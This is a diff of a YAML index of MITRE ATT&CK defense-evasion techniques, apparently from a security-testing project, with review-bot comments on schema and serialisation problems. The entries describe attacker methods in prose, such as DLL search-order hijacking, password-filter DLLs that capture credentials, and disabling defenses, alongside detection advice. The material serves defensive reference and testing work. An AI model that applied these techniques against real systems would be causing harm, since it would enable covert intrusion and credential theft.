Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
- Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+ Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
@@ -3185,8 +3251,8 @@ defense-evasion:
- Travis Smith, Tripwire
- Stefan Kanthak
- Marina Liang
- - Will Alexander
- - Ami Holeston
+ - Ami Holeston, CrowdStrike
+ - Will Alexander, CrowdStrike
x_mitre_deprecated: false
x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -3200,7 +3266,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -3226,6 +3292,10 @@ defense-evasion:
description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
17, 2020.
url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+ - source_name: Hexacorn DLL Hijacking
+ description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+ Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
- source_name: Microsoft Security Advisory 2269637
description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
March 13, 2020.
@@ -3253,12 +3323,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1574.001
atomic_tests: []
T1553.001:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-21T19:30:58.414Z'
name: 'Subvert Trust Controls: Gatekeeper Bypass'
description: |-
Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization )
@@ -3354,7 +3423,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.001
atomic_tests:
- name: Gatekeeper Bypass
@@ -3439,7 +3507,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.009:
technique:
@@ -3504,11 +3571,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1222.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:27:04.900Z'
name: 'File and Directory Permissions Modification: Windows File and Directory
Permissions Modification'
description: |-
@@ -3569,12 +3635,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1222.001
atomic_tests: []
T1574.014:
technique:
- modified: '2024-04-18T15:03:32.158Z'
+ modified: '2024-04-28T15:44:25.342Z'
name: AppDomainManager
description: "Adversaries may execute their own malicious payloads by hijacking
how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -3600,7 +3665,7 @@ defense-evasion:
phase_name: defense-evasion
x_mitre_contributors:
- Thomas B
- - Ivy Bostock
+ - Ivy Drexel
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -3642,7 +3707,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.007:
technique:
@@ -3684,7 +3748,7 @@ defense-evasion:
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.
Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated
policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T17:33:16.346Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Signed Binary Proxy Execution: Msiexec'
x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -3707,36 +3771,11 @@ defense-evasion:
- Application control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.007
atomic_tests: []
T1556.002:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
- type: attack-pattern
- created: '2020-02-11T19:05:45.829Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.002
- url: https://attack.mitre.org/techniques/T1556/002
- - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
- description: Fuller, R. (2013, September 11). Stealing passwords every time
- they change. Retrieved November 21, 2017.
- source_name: Carnal Ownage Password Filters Sept 2013
- - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
- description: Bialek, J. (2013, September 15). Intercepting Password Changes
- With Function Hooking. Retrieved November 21, 2017.
- source_name: Clymb3r Function Hook Passwords Sept 2013
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T16:16:18.271Z'
name: 'Modify Authentication Process: Password Filter DLL'
description: "Adversaries may register malicious password filter dynamic link
libraries (DLLs) into the authentication process to acquire user credentials
@@ -3760,22 +3799,44 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Creation'
- 'Module: Module Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+ created: '2020-02-11T19:05:45.829Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/002
+ external_id: T1556.002
+ - source_name: Clymb3r Function Hook Passwords Sept 2013
+ description: Bialek, J. (2013, September 15). Intercepting Password Changes
+ With Function Hooking. Retrieved November 21, 2017.
+ url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+ - source_name: Carnal Ownage Password Filters Sept 2013
+ description: Fuller, R. (2013, September 11). Stealing passwords every time
+ they change. Retrieved November 21, 2017.
+ url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.002
atomic_tests: []
T1070.007:
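Review bot: once the key reordering in this and the previous hunk is discounted, the real change to T1556.002 is `modified`, `x_mitre_version` 2.0 to 2.1, `x_mitre_attack_spec_version` 3.2.0, `revoked: false` and `x_mitre_deprecated: false` added, and `x_mitre_permissions_required` (Administrator, SYSTEM) dropped. The dropped field is the one consumers can trip over: other entries in this file still carry it (T1542.005, T1218.004 and T1600.001 keep `- Administrator`), so anything that reads `x_mitre_permissions_required` to decide test prerequisites or required privilege must treat it as optional per technique. Worth a line in the commit message, since the diff hides it behind roughly sixty lines of moved keys.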
@@ -3850,7 +3911,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1600.001:
technique:
@@ -3876,7 +3936,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T22:36:22.369Z'
name: Reduce Key Space
description: |-
Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)
@@ -3899,8 +3959,6 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1070.003:
technique:
@@ -3996,7 +4054,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.003
atomic_tests:
- name: Clear Bash history (rm)
@@ -4104,60 +4161,71 @@ defense-evasion:
name: sh
T1202:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-03T14:47:17.154Z'
+ name: Indirect Command Execution
+ description: |-
+ Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), Scriptrunner.exe, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe)
+
+ Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
x_mitre_contributors:
- Matthew Demaske, Adaptforward
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ - Liran Ravich, CardinalOps
+ x_mitre_deprecated: false
+ x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
+ such as Sysmon, for events such as process creations that include or are resulting
+ from parameters associated with invoking programs/commands/files and/or spawning
+ child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'Process: Process Creation'
+ x_mitre_defense_bypassed:
+ - Static File Analysis
+ - Application Control
type: attack-pattern
id: attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e
created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.1'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1202
url: https://attack.mitre.org/techniques/T1202
+ external_id: T1202
+ - source_name: Bleeping Computer - Scriptrunner.exe
+ description: Bill Toulas. (2023, January 4). Hackers abuse Windows error reporting
+ tool to deploy malware. Retrieved July 8, 2024.
+ url: https://www.bleepingcomputer.com/news/security/hackers-abuse-windows-error-reporting-tool-to-deploy-malware/
- source_name: Evi1cg Forfiles Nov 2017
- url: https://twitter.com/Evi1cg/status/935027922397573120
description: Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved
- January 22, 2018.
+ September 12, 2024.
+ url: https://x.com/Evi1cg/status/935027922397573120
- source_name: RSA Forfiles Aug 2017
- url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
description: Partington, E. (2017, August 14). Are you looking out for forfiles.exe
(if you are watching for cmd.exe). Retrieved January 22, 2018.
+ url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
+ - source_name: Secure Team - Scriptrunner.exe
+ description: Secure Team - Information Assurance. (2023, January 8). Windows
+ Error Reporting Tool Abused to Load Malware. Retrieved July 8, 2024.
+ url: https://secureteam.co.uk/2023/01/08/windows-error-reporting-tool-abused-to-load-malware/
+ - source_name: SS64
+ description: SS64. (n.d.). ScriptRunner.exe. Retrieved July 8, 2024.
+ url: https://ss64.com/nt/scriptrunner.html
- source_name: VectorSec ForFiles Aug 2017
- url: https://twitter.com/vector_sec/status/896049052642533376
description: vector_sec. (2017, August 11). Defenders watching launches of
- cmd? What about forfiles?. Retrieved January 22, 2018.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
-
- Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Indirect Command Execution
- x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
- such as Sysmon, for events such as process creations that include or are resulting
- from parameters associated with invoking programs/commands/files and/or spawning
- child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- x_mitre_is_subtechnique: false
- x_mitre_data_sources:
- - 'Command: Command Execution'
- - 'Process: Process Creation'
- x_mitre_defense_bypassed:
- - Static File Analysis
- - Application Control
- x_mitre_attack_spec_version: 2.1.0
+ cmd? What about forfiles?. Retrieved September 12, 2024.
+ url: https://x.com/vector_sec/status/896049052642533376
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1202
atomic_tests: []
T1140:
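Review bot: most of this hunk is key reordering rather than content (`url` and `external_id` swap places under every `external_references` entry, and `object_marking_refs`, `kill_chain_phases`, `x_mitre_data_sources` and `x_mitre_defense_bypassed` all move), which buries the real T1202 updates: `x_mitre_version` 1.1 to 1.2, the added contributor, the three new citations (Bleeping Computer, Secure Team, SS64), the twitter.com to x.com URL changes and `x_mitre_attack_spec_version` 2.1.0 to 3.2.0. Have the generator emit keys in a fixed order so regenerations produce a reviewable diff. Separately, `spec_version: '2.1'` is dropped here and, as the following hunks show, for every technique in the file; if any consumer validates that STIX field, the removal needs a changelog entry.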
@@ -4224,7 +4292,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1140
atomic_tests:
- name: Base64 decoding with Python
@@ -4449,17 +4516,20 @@ defense-evasion:
elevation_required: false
T1562:
technique:
- modified: '2023-10-20T16:43:53.391Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Impair Defenses
- description: |-
+ description: |+
Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
- Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Emotet shutdown)
+ Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out, preventing a system from shutting down, or disabling or modifying the update process. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Google Cloud Mandiant UNC3886 2024)(Citation: Emotet shutdown)
- Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Jamie Williams (U ω U), PANW Unit 42
+ - Liran Ravich, CardinalOps
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor processes and command-line arguments to see if security tools or logging services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Lack of log events may be suspicious.
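Review bot: the block chomping indicator on `description` changes from `|-` to `|+`, which keeps every trailing newline, so the stored T1562 description now ends in one or more line breaks while neighbouring techniques (T1036, T1205, T1497.003) still use `|-`. Strip trailing whitespace from the upstream text in the generator instead of preserving it. The paragraph merge itself (the "event aggregation" sentence folded into the second paragraph, plus the new UNC3886 citation) reads correctly.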
@@ -4468,15 +4538,17 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Office 365
- IaaS
- Linux
- macOS
- Containers
- Network
- x_mitre_version: '1.5'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'File: File Modification'
- 'Cloud Service: Cloud Service Disable'
@@ -4514,15 +4586,17 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1562
external_id: T1562
+ - source_name: Google Cloud Mandiant UNC3886 2024
+ description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+ Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+ Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+ url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
- source_name: Emotet shutdown
description: The DFIR Report. (2022, November 8). Emotet Strikes Again – LNK
File Leads to Domain Wide Ransomware. Retrieved March 6, 2023.
url: https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562
atomic_tests: []
T1055.003:
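Review bot: the new `Google Cloud Mandiant UNC3886 2024` citation description starts with a stray leading space (`" Punsaen Boonyakarn, Shawn Chew, ..."`), which is also why this scalar ends up double-quoted and wrapped differently from every other citation in the block. Trim the leading space at the source so the entry serialises like the `Emotet shutdown` citation directly below it.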
@@ -4546,7 +4620,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:22:50.800Z'
name: Thread Execution Hijacking
description: "Adversaries may inject malicious code into hijacked processes
in order to evade process-based defenses as well as possibly elevate privileges.
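Review bot: `modified` for T1055.003 moves backwards, from 2022-04-25 to 2021-10-18. A last-modified timestamp that decreases on regeneration indicates the index is now built from a different STIX source or field than before; the same regression appears further down for T1055 (2023-05-09 to 2023-03-30), T1205 (2022-11-08 to 2022-10-19), T1218.002 (2022-05-11 to 2022-03-11) and T1599.001 (2021-04-29 to 2020-10-21). Confirm which dataset is authoritative before merging, since an older date can mean these entries went stale rather than being refreshed.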
@@ -4594,13 +4668,11 @@ defense-evasion:
- Anti-virus
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.003
atomic_tests: []
T1036:
technique:
- modified: '2024-03-08T17:00:59.133Z'
+ modified: '2024-10-16T20:10:38.450Z'
name: Masquerading
description: |-
Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
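Review bot: for T1055.003 both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are removed, whereas T1202 earlier in the diff keeps `x_mitre_attack_spec_version` and bumps it to 3.2.0, and T1218.002 and T1599.001 below lose the field the same way as T1055.003. Either carry `x_mitre_attack_spec_version` with its upstream value for every technique or drop it for all; a mix makes it impossible to filter the index by ATT&CK spec version.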
@@ -4616,7 +4688,7 @@ defense-evasion:
- Felipe Espósito, @Pr0teus
- Elastic
- Bartosz Jerzman
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.
@@ -4641,6 +4713,7 @@ defense-evasion:
- 'Process: Process Creation'
- 'Image: Image Metadata'
- 'Scheduled Job: Scheduled Job Metadata'
+ - 'User Account: User Account Creation'
- 'File: File Metadata'
- 'Scheduled Job: Scheduled Job Modification'
- 'Command: Command Execution'
@@ -4658,8 +4731,8 @@ defense-evasion:
external_id: T1036
- source_name: Twitter ItsReallyNick Masquerading Update
description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
- Retrieved April 22, 2019.
- url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/1055321652777619457
- source_name: Elastic Masquerade Ball
description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
Retrieved October 31, 2016.'
@@ -4672,12 +4745,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036
atomic_tests: []
T1070.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:43:56.839Z'
name: 'Email Collection: Mailbox Manipulation'
description: "Adversaries may modify mail and mail application data to remove
evidence of their activity. Email applications allow users and other programs
@@ -4714,9 +4786,8 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'File: File Deletion'
@@ -4754,9 +4825,8 @@ defense-evasion:
url: https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.008
atomic_tests:
- name: Copy and Delete Mailbox Data on macOS
@@ -4795,7 +4865,7 @@ defense-evasion:
elevation_required: true
T1055:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:45.488Z'
name: Process Injection
description: "Adversaries may inject code into processes in order to evade process-based
defenses as well as possibly elevate privileges. Process injection is a method
@@ -4898,12 +4968,11 @@ defense-evasion:
url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1055
atomic_tests: []
T1205:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T23:08:40.603Z'
name: Traffic Signaling
description: |-
Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -4987,7 +5056,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218:
technique:
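Review bot: the T1205 block has no `identifier:` key between `x_mitre_modified_by_ref` and `atomic_tests: []`, while T1218 immediately below and the other techniques in this section carry `identifier: <ID>`. This is pre-existing context rather than something the hunk introduces, but the regeneration is the right moment to make the schema uniform; the same gap is visible for T1564.011 and T1599.001 later in the diff.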
@@ -5054,60 +5122,77 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218
atomic_tests: []
T1070.006:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Romain Dumont, ESET
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
